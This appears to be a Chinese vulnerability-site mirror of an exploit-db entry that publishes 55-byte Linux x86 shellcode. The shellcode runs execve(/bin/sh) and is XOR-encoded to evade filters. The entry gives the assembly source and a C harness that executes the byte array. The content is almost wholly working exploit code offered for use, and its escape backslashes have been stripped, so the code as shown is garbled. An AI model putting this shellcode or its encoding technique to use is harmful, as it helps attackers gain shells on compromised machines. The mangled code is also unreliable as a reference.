Linux/x86 – execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)

Linux/x86 – execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)

漏洞ID 1054600 漏洞类型
发布时间 2004-09-12 更新时间 2004-09-12
图片[1]-Linux/x86 – execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13456
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
.file "xor-encrypted shellcode"
.version "1.0"
.text
	.align 4
.globl main
	.type main,@function
_start:
	xorl	%eax,%eax
	jmp    	0x22
	popl   	%ebx	
	movl	8(%ebx),%edx
	xor	%edx,(%ebx)
	xor	%edx,4(%ebx)
	xor	%edx,%edx
	movl   	%ebx,0x8(%esp)
	movl   	%edx,0xc(%esp)
	movb   	$0xb,%al
	leal   	0x8(%esp),%ecx
	int    	$0x80
	xorl   	%ebx,%ebx
	movl   	%ebx,%eax
	incl   	%eax
	int   	$0x80
	call	-0x27
	.string "x6ex23x28x2fx6ex32x29x41x41x41x41x41"
*/

#define NAME "encrypted"

char code[]=
"x31xc0xebx22x5bx8bx53x08x31x13x31x53x04x31xd2x89"
"x5cx24x08x89x54x24x0cxb0x0bx8dx4cx24x08xcdx80x31"
"xdbx89xd8x40xcdx80xe8xd9xffxffxff"
"x6ex23x28x2fx6ex32x29x41" /* encrypted "/bin/sh" */
"x41x41x41x41";     /* Conversion chars */

main()
{
  int (*funct)();
  funct = (int (*)()) code;
  printf("%s shellcodentSize = %dn",NAME,strlen(code));
  (int)(*funct)();
}

// milw0rm.com [2004-09-12]

相关推荐: Multiple Squid Remote Code Execution Vulnerabilities

Multiple Squid Remote Code Execution Vulnerabilities 漏洞ID 1101851 漏洞类型 Unknown 发布时间 2002-07-03 更新时间 2002-07-03 CVE编号 N/A CNNVD-ID …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享